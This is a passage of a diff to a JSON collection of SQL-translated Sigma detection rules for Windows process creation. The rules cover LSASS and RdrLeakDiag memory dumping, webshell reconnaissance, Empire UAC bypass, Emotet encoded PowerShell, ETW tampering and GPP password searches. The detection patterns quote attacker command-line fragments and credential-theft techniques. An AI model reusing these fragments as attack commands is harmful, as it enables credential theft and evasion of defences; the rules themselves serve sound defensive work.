ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR 
CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName 
LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.execution", - "attack.t1559" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine 
LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -9174,320 +8942,296 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" - }, - { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE 
'\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Legitimate administration activity" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. 
before log collection agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.exfiltration" ], "falsepositives": [ "Unknown" 
], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", - "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "author": 
"Nasreddine Bencherchali (Nextron Systems)", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "status": "test", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", "attack.persistence", - "attack.t1053.005" + "attack.t1546" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE 
'%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.defense_evasion", "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program 
Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = 
'4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
